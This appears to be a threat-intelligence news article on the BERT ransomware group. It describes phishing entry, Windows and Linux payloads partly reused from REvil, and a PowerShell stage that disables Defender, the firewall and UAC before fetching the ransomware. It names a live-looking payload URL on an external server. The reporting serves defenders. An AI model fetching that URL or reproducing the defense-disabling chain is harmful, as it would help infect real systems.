A newly evolved ransomware group dubbed “BERT” has significantly ramped up its operations, now actively targeting Linux environments through weaponized ELF binaries a notable shift from its original focus on Windows-based systems.
First detected in April 2025, BERT’s activity can be traced back to mid-March 2025, with researchers attributing the group’s rapid rise to its aggressive use of customized malware and advanced exploitation techniques.
Attack Vector
BERT appears to primarily leverage phishing campaigns to infiltrate victim networks. Once inside, the attackers deploy tailored payloads depending on the victim’s operating system.
Notably, the group has established multiple dark web portals: one for operational communication and another to leak exfiltrated data in staged, zipped archives labeled as “part1,” “part2,” etc.
Both leak and storage servers reportedly run Apache/2.4.52 on Ubuntu, signaling a calculated infrastructure deployment.
Unlike many peers, BERT does not maintain a dedicated ransomware negotiation portal.
Instead, ransom demands which typically request payment in Bitcoin are negotiated via privacy-centric messaging apps. For example, demands as high as 1.5 BTC have been observed in several incidents.

BERT’s targets span multiple countries, with the United States leading in victim count, closely followed by the UK, Malaysia, Taiwan, Colombia, and Turkey.
According to The Raven File Report, the services and manufacturing sectors have been disproportionately affected, though logistics, IT, and healthcare organizations have also fallen prey.
Technical Analysis
Upon analysis of acquired ransomware samples, researchers identified six PE (Windows executable) files and two ELF (Linux executable) files, with only one bearing a plausible timestamp (May 20, 2025).
The rest exhibit artificially manipulated creation dates projected into future decades, likely as an evasion tactic.
The primary file names associated with BERT include “newcryptor.exe,” “Bert,” “Bert11,” “worker.exe,” and “payload.exe.”
While the Windows variant utilizes RSA encryption through WinAPI and appends unique file extensions such as “encryptedbybert,” “encryptedbybert3,” and “encryptedbybert11,” the Linux variant stands out by incorporating substantial code from the infamous Sodinokibi (Revil) ransomware an 80% codebase match was detected.
The Linux payload uses AES and RC4 PRGA, and in some cases, Salsa20 and ChaCha stream ciphers, with sensitive data also subject to Base64 encoding for added obscurity.
An innovative twist is the observed use of AWK commands to interrogate system registries, diverging from standard ransomware practices.

The Windows infection chain often begins with a malicious PowerShell script hosted on an external server (e.g., http://185.100.157.74/start.ps1).
This script systematically disables key security controls disabling Windows Defender, stopping firewall and related services, and turning off User Account Control (UAC).
Once system defenses are neutralized, the script fetches and executes the main ransomware payload from the same server.
Incidentally, both the script and executable are maintained on infrastructure registered to UNITEDNET (Edinaya Set Limited), a Russian firm, continuing a trend of leveraging Russian hosting providers for cybercrime operations.
BERT’s willingness to self-code for the Windows platform while repurposing the Revil codebase for Linux operations underscores the group’s technical adaptability and evolving sophistication.
By weaponizing both PE and ELF binaries and relying on multi-stage attacks that disable security controls before detonation, BERT has positioned itself as a formidable threat in the ransomware landscape.
Security researchers caution organizations, particularly those with Linux workloads, to bolster detection and response efforts as BERT continues to refine its arsenal.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.